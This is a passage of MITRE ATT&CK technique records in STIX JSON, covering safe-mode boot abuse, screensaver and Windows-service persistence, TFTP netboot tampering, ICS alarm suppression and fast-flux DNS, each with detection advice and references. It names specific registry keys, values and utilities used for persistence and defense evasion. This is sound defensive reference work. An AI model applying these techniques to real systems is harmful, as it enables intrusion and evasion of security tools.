"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["SaaS", "Office 365"], "x_mitre_version": "1.1", "x_mitre_defense_bypassed": ["Multi-Factor Authentication", "Logon Credentials"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--27960489-4e7f-461d-a62a-f5c0cb521e4a", "created": "2019-08-30T12:55:58.607Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1527", "external_id": "T1527"}, {"source_name": "Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019", "description": "Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019.", "url": "https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/"}, {"source_name": "Microsoft Identity Platform Access 2019", "description": "Cai, S., Flores, J., de Guzman, C., et. al.. (2019, August 27). Microsoft identity platform access tokens. Retrieved October 4, 2019.", "url": "https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens"}, {"source_name": "okta", "description": "okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved September 12, 2019.", "url": "https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen"}, {"source_name": "Staaldraad Phishing with OAuth 2017", "description": "Stalmans, E.. (2017, August 2). Phishing with OAuth and o365/Azure. Retrieved October 4, 2019.", "url": "https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Safe Mode Boot", "description": "Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)\n\nAdversaries may abuse safe mode to disable endpoint defenses that may not start with a limited boot. Hosts can be forced into safe mode after the next reboot via modifications to Boot Configuration Data (BCD) stores, which are files that manage boot application settings.(Citation: Microsoft bcdedit 2021)\n\nAdversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)). Malicious [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) objects may also be registered and loaded in safe mode.(Citation: Sophos Snatch Ransomware 2019)(Citation: CyberArk Labs Safe Mode 2016)(Citation: Cybereason Nocturnus MedusaLocker 2020)(Citation: BleepingComputer REvil 2021)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Jorell Magtibay, National Australia Bank Limited", "Kiyohito Yamamoto, RedLark, NTT Communications", "Yusuke Kubo, RedLark, NTT Communications"], "x_mitre_detection": "Monitor Registry modification and additions for services that may start on safe mode. For example, a program can be forced to start on safe mode boot by adding a \\* in front of the \"Startup\" value name: HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\[\"\\*Startup\"=\"{Path}\"] or by adding a key to HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal.(Citation: BleepingComputer REvil 2021)(Citation: Sophos Snatch Ransomware 2019)\n\nMonitor execution of processes and commands associated with making configuration changes to boot settings, such as bcdedit.exe and bootcfg.exe.(Citation: Microsoft bcdedit 2021)(Citation: Microsoft Bootcfg)(Citation: Sophos Snatch Ransomware 2019)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Host Intrusion Prevention Systems", "Anti-virus"], "x_mitre_permissions_required": ["Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--28170e17-8384-415c-8486-2e6b294cb803", "created": "2021-06-23T20:00:27.600Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1562/009", "external_id": "T1562.009"}, {"source_name": "Microsoft Safe Mode", "description": "Microsoft. (n.d.). Start your PC in safe mode in Windows 10. Retrieved June 23, 2021.", "url": "https://support.microsoft.com/en-us/windows/start-your-pc-in-safe-mode-in-windows-10-92c27cff-db89-8644-1ce4-b3e5e56fe234"}, {"source_name": "Sophos Snatch Ransomware 2019", "description": "Sophos. (2019, December 9). Snatch ransomware reboots PCs into Safe Mode to bypass protection. Retrieved June 23, 2021.", "url": "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/"}, {"source_name": "Microsoft bcdedit 2021", "description": "Microsoft. (2021, May 27). bcdedit. Retrieved June 23, 2021.", "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bcdedit"}, {"source_name": "CyberArk Labs Safe Mode 2016", "description": "Naim, D.. (2016, September 15). CyberArk Labs: From Safe Mode to Domain Compromise. Retrieved June 23, 2021.", "url": "https://www.cyberark.com/resources/blog/cyberark-labs-from-safe-mode-to-domain-compromise"}, {"source_name": "Cybereason Nocturnus MedusaLocker 2020", "description": "Cybereason Nocturnus. (2020, November 19). Cybereason vs. MedusaLocker Ransomware. Retrieved June 23, 2021.", "url": "https://www.cybereason.com/blog/medusalocker-ransomware"}, {"source_name": "BleepingComputer REvil 2021", "description": "Abrams, L. (2021, March 19). REvil ransomware has a new \u2018Windows Safe Mode\u2019 encryption mode. Retrieved June 23, 2021.", "url": "https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/"}, {"source_name": "Microsoft Bootcfg", "description": "Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August 30, 2021.", "url": "https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:01.165Z", "name": "Wireless Compromise", "description": "Adversaries may perform wireless compromise as a method of gaining communications and unauthorized access to a wireless network. Access to a wireless network may be gained through the compromise of a wireless device. (Citation: Alexander Bolshev, Gleb Cherbov July 2014) (Citation: Alexander Bolshev March 2014) Adversaries may also utilize radios and other wireless communication devices on the same frequency as the wireless network. Wireless compromise can be done as an initial access vector from a remote distance. \n\nA Polish student used a modified TV remote controller to gain access to and control over the Lodz city tram system in Poland. (Citation: John Bill May 2017) (Citation: Shelley Smith February 2008) The remote controller device allowed the student to interface with the trams network to modify track settings and override operator control. The adversary may have accomplished this by aligning the controller to the frequency and amplitude of IR control protocol signals. (Citation: Bruce Schneier January 2008) The controller then enabled initial access to the network, allowing the capture and replay of tram signals. (Citation: John Bill May 2017)", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "initial-access"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Scott Dougherty"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.2", "x_mitre_data_sources": ["Logon Session: Logon Session Creation", "Application Log: Application Log Content", "Network Traffic: Network Traffic Flow"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--2877063e-1851-48d2-bcc6-bc1d2733157e", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0860", "external_id": "T0860"}, {"source_name": "Alexander Bolshev March 2014", "description": "Alexander Bolshev 2014, March 11 S4x14: HART As An Attack Vector Retrieved. 2020/01/05 ", "url": "https://www.slideshare.net/dgpeters/17-bolshev-1-13"}, {"source_name": "Alexander Bolshev, Gleb Cherbov July 2014", "description": "Alexander Bolshev, Gleb Cherbov 2014, July 08 ICSCorsair: How I will PWN your ERP through 4-20 mA current loop Retrieved. 2020/01/05 ", "url": "https://www.blackhat.com/docs/us-14/materials/us-14-Bolshev-ICSCorsair-How-I-Will-PWN-Your-ERP-Through-4-20mA-Current-Loop-WP.pdf"}, {"source_name": "Bruce Schneier January 2008", "description": "Bruce Schneier 2008, January 17 Hacking Polish Trams Retrieved. 2019/10/17 ", "url": "https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html"}, {"source_name": "John Bill May 2017", "description": "John Bill 2017, May 12 Hacked Cyber Security Railways Retrieved. 2019/10/17 ", "url": "https://www.londonreconnections.com/2017/hacked-cyber-security-railways/"}, {"source_name": "Shelley Smith February 2008", "description": "Shelley Smith 2008, February 12 Teen Hacker in Poland Plays Trains and Derails City Tram System Retrieved. 2019/10/17 ", "url": "https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:01.367Z", "name": "Change Operating Mode", "description": "Adversaries may change the operating mode of a controller to gain additional access to engineering functions such as Program Download. Programmable controllers typically have several modes of operation that control the state of the user program and control access to the controllers API. Operating modes can be physically selected using a key switch on the face of the controller but may also be selected with calls to the controllers API. Operating modes and the mechanisms by which they are selected often vary by vendor and product line. Some commonly implemented operating modes are described below: \n\n* Program - This mode must be enabled before changes can be made to a devices program. This allows program uploads and downloads between the device and an engineering workstation. Often the PLCs logic Is halted, and all outputs may be forced off. (Citation: N.A. October 2017) \n* Run - Execution of the devices program occurs in this mode. Input and output (values, points, tags, elements, etc.) are monitored and used according to the programs logic. [Program Upload](https://attack.mitre.org/techniques/T0845) and [Program Download](https://attack.mitre.org/techniques/T0843) are disabled while in this mode. (Citation: Omron) (Citation: Machine Information Systems 2007) (Citation: N.A. October 2017) (Citation: PLCgurus 2021) \n* Remote - Allows for remote changes to a PLCs operation mode. (Citation: PLCgurus 2021) \n* Stop - The PLC and program is stopped, while in this mode, outputs are forced off. (Citation: Machine Information Systems 2007) \n* Reset - Conditions on the PLC are reset to their original states. Warm resets may retain some memory while cold resets will reset all I/O and data registers. (Citation: Machine Information Systems 2007) \n* Test / Monitor mode - Similar to run mode, I/O is processed, although this mode allows for monitoring, force set, resets, and more generally tuning or debugging of the system. Often monitor mode may be used as a trial for initialization. (Citation: Omron)", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "execution"}, {"kill_chain_name": "mitre-ics-attack", "phase_name": "evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.0", "x_mitre_data_sources": ["Network Traffic: Network Traffic Content", "Application Log: Application Log Content", "Operational Databases: Device Alarm"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0858", "external_id": "T0858"}, {"source_name": "Machine Information Systems 2007", "description": "Machine Information Systems 2007 How PLCs Work Retrieved. 2021/01/28 ", "url": "http://www.machine-information-systems.com/How_PLCs_Work.html"}, {"source_name": "N.A. October 2017", "description": "N.A. 2017, October What are the different operating modes in PLC? Retrieved. 2021/01/28 ", "url": "https://forumautomation.com/t/what-are-the-different-operating-modes-in-plc/2489"}, {"source_name": "Omron", "description": "Omron Machine Information Systems 2007 How PLCs Work Retrieved. 2021/01/28 PLC Different Operating Modes Retrieved. 2021/01/28 ", "url": "https://www.omron-ap.com/service_support/FAQ/FAQ00002/index.asp#:~:text=In%20PROGRAM%20mode%2C%20the%20CPU,can%20be%20created%20or%20modified."}, {"source_name": "PLCgurus 2021", "description": "PLCgurus 2021 PLC Basics Modes Of Operation Retrieved. 2021/01/28 ", "url": "https://www.plcgurus.net/plc-basics/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Screensaver", "description": "Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in C:\\Windows\\System32\\, and C:\\Windows\\sysWOW64\\ on 64-bit Windows systems, along with screensavers included with base Windows installations. \n\nThe following screensaver settings are stored in the Registry (HKCU\\Control Panel\\Desktop\\) and could be manipulated to achieve persistence:\n\n* SCRNSAVE.exe - set to malicious PE path\n* ScreenSaveActive - set to '1' to enable the screensaver\n* ScreenSaverIsSecure - set to '0' to not require a password to unlock\n* ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed\n\nAdversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Bartosz Jerzman"], "x_mitre_detection": "Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.\n\nTools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--2892b9ee-ca9f-4723-b332-0dc6e843a8ae", "created": "2018-01-16T16:13:52.465Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1180", "external_id": "T1180"}, {"source_name": "Wikipedia Screensaver", "description": "Wikipedia. (2017, November 22). Screensaver. Retrieved December 5, 2017.", "url": "https://en.wikipedia.org/wiki/Screensaver"}, {"source_name": "ESET Gazer Aug 2017", "description": "ESET. (2017, August). Gazing at Gazer: Turla\u2019s new second stage backdoor. Retrieved September 14, 2017.", "url": "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2021-04-29T14:49:39.188Z", "name": "TFTP Boot", "description": "Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.\n\nAdversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Consider comparing a copy of the network device configuration and system image against a known-good version to discover unauthorized changes to system boot, startup configuration, or the running OS. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot) (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)\n\nReview command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration. (Citation: Cisco IOS Software Integrity Assurance - Command History) Check boot information including system uptime, image booted, and startup configuration to determine if results are consistent with expected behavior in the environment. (Citation: Cisco IOS Software Integrity Assurance - Boot Information) Monitor unusual connections or connection attempts to the device that may specifically target TFTP or other file-sharing protocols.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Network"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--28abec6c-4443-4b03-8206-07f2e264a6b4", "created": "2020-10-20T00:06:56.180Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1542/005", "external_id": "T1542.005"}, {"source_name": "Cisco Blog Legacy Device Attacks", "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954"}, {"source_name": "Cisco IOS Software Integrity Assurance - Secure Boot", "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Secure Boot. Retrieved October 19, 2020.", "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#35"}, {"source_name": "Cisco IOS Software Integrity Assurance - Image File Verification", "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Image File Verification. Retrieved October 19, 2020.", "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#7"}, {"source_name": "Cisco IOS Software Integrity Assurance - Run-Time Memory Verification", "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.", "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#13"}, {"source_name": "Cisco IOS Software Integrity Assurance - Command History", "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command History. Retrieved October 21, 2020.", "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#23"}, {"source_name": "Cisco IOS Software Integrity Assurance - Boot Information", "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot Information. Retrieved October 21, 2020.", "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#26"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-13T17:57:01.578Z", "name": "Alarm Suppression", "description": "Adversaries may target protection function alarms to prevent them from notifying operators of critical conditions. Alarm messages may be a part of an overall reporting system and of particular interest for adversaries. Disruption of the alarm system does not imply the disruption of the reporting system as a whole.\n\nA Secura presentation on targeting OT notes a dual fold goal for adversaries attempting alarm suppression: prevent outgoing alarms from being raised and prevent incoming alarms from being responded to. (Citation: Jos Wetzels, Marina Krotofil 2019) The method of suppression may greatly depend on the type of alarm in question: \n\n* An alarm raised by a protocol message \n* An alarm signaled with I/O \n* An alarm bit set in a flag (and read) \n\nIn ICS environments, the adversary may have to suppress or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring. (Citation: Jos Wetzels, Marina Krotofil 2019) Methods of suppression may involve tampering or altering device displays and logs, modifying in memory code to fixed values, or even tampering with assembly level instruction code.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "inhibit-response-function"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Marina Krotofil", "Jos Wetzels - Midnight Blue"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.2", "x_mitre_data_sources": ["Network Traffic: Network Traffic Flow", "Operational Databases: Process History/Live Data", "Operational Databases: Device Alarm", "Operational Databases: Process/Event Alarm"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0878", "external_id": "T0878"}, {"source_name": "Jos Wetzels, Marina Krotofil 2019", "description": "Jos Wetzels, Marina Krotofil 2019 A Diet of Poisoned Fruit: Designing Implants & OT Payloads for ICS Embedded Devices Retrieved. 2019/11/01 ", "url": "https://troopers.de/downloads/troopers19/TROOPERS19_NGI_IoT_diet_poisoned_fruit.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-04-11T19:25:51.394Z", "name": "Windows Service", "description": "Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.\n\nAdversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API. \n\nAdversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded and registered via [Native API](https://attack.mitre.org/techniques/T1106) functions such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creating the required service Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)), or by using command-line utilities such as `PnPUtil.exe`.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Unit42 AcidBox June 2020) Adversaries may leverage these drivers as [Rootkit](https://attack.mitre.org/techniques/T1014)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as \"Bring Your Own Vulnerable Driver\" (BYOVD)) as part of [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020)\n\nServices may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002).\n\nTo make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (ex: using a service and/or payload name related to a legitimate OS or benign software component). Adversaries may also create \u2018hidden\u2019 services (i.e., [Hide Artifacts](https://attack.mitre.org/techniques/T1564)), for example by using the `sc sdset` command to set service permissions via the Service Descriptor Definition Language (SDDL). This may hide a Windows service from the view of standard service enumeration methods such as `Get-Service`, `sc query`, and `services.exe`.(Citation: SANS 1)(Citation: SANS 2)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Matthew Demaske, Adaptforward", "Pedro Harrison", "Mayuresh Dani, Qualys", "Wietze Beukema, @wietze", "Akshat Pradhan, Qualys", "Wirapong Petshagun"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor processes and command-line arguments for actions that could create or modify services. Command-line invocation of tools capable of adding or modifying services may be unusual, depending on how systems are typically used in a particular environment. Services may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. Remote access tools with built-in features may also interact directly with the Windows API to perform these functions outside of typical system utilities. Collect service utility execution and service binary path arguments used for analysis. Service binary paths may even be changed to execute commands or scripts. \n\nLook for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Service information is stored in the Registry at HKLM\\SYSTEM\\CurrentControlSet\\Services. Changes to the binary path and the service startup type changed from manual or disabled to automatic, if it does not typically do so, may be suspicious. Tools such as Sysinternals Autoruns may also be used to detect system service changes that could be attempts at persistence.(Citation: TechNet Autoruns) \n\nCreation of new services may generate an alterable event (ex: Event ID 4697 and/or 7045 (Citation: Microsoft 4697 APR 2017)(Citation: Microsoft Windows Event Forwarding FEB 2018)). New, benign services may be created during installation of new software.\n\nSuspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.5", "x_mitre_data_sources": [], "x_mitre_effective_permissions": ["Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32", "created": "2020-01-17T19:13:50.402Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1543/003", "external_id": "T1543.003"}, {"source_name": "Microsoft Windows Event Forwarding FEB 2018", "description": "Hardy, T. & Hall, J. (2018, February 15). Use Windows Event Forwarding to help with intrusion detection. Retrieved August 7, 2018.", "url": "https://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection"}, {"source_name": "ESET InvisiMole June 2020", "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020.", "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf"}, {"source_name": "SANS 1", "description": "Joshua Wright. (2020, October 13). Retrieved March 22, 2024.", "url": "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/"}, {"source_name": "SANS 2", "description": "Joshua Wright. (2020, October 14). Retrieved March 22, 2024.", "url": "https://www.sans.org/blog/defense-spotlight-finding-hidden-windows-services/"}, {"source_name": "TechNet Services", "description": "Microsoft. (n.d.). Services. Retrieved June 7, 2016.", "url": "https://technet.microsoft.com/en-us/library/cc772408.aspx"}, {"source_name": "Microsoft 4697 APR 2017", "description": "Miroshnikov, A. & Hall, J. (2017, April 18). 4697(S): A service was installed in the system. Retrieved August 7, 2018.", "url": "https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697"}, {"source_name": "Symantec W.32 Stuxnet Dossier", "description": "Nicolas Falliere, Liam O. Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier. Retrieved December 7, 2020.", "url": "https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf"}, {"source_name": "Unit42 AcidBox June 2020", "description": "Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations. Retrieved March 16, 2021.", "url": "https://unit42.paloaltonetworks.com/acidbox-rare-malware/"}, {"source_name": "TechNet Autoruns", "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902"}, {"source_name": "Crowdstrike DriveSlayer February 2022", "description": "Thomas, W. et al. (2022, February 25). CrowdStrike Falcon Protects from New Wiper Malware Used in Ukraine Cyberattacks. Retrieved March 25, 2022.", "url": "https://www.crowdstrike.com/blog/how-crowdstrike-falcon-protects-against-wiper-malware-used-in-ukraine-attacks/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Fast Flux DNS", "description": "Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)\n\nThe simplest, \"single-flux\" method, involves registering and de-registering an addresses as part of the DNS A (address) record list for a single DNS name. These registrations have a five-minute average lifespan, resulting in a constant shuffle of IP address resolution.(Citation: Fast Flux - Welivesecurity)\n\nIn contrast, the \"double-flux\" method registers and de-registers an address as part of the DNS Name Server record list for the DNS zone, providing additional resilience for the connection. With double-flux additional hosts can act as a proxy to the C2 host, further insulating the true source of the C2 channel.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "In general, detecting usage of fast flux DNS is difficult due to web traffic load balancing that services client requests quickly. In single flux cases only IP addresses change for static domain names. In double flux cases, nothing is static. Defenders such as domain registrars and service providers are likely in the best position for detection.", "x_mitre_domains": ["enterprise-attack"], 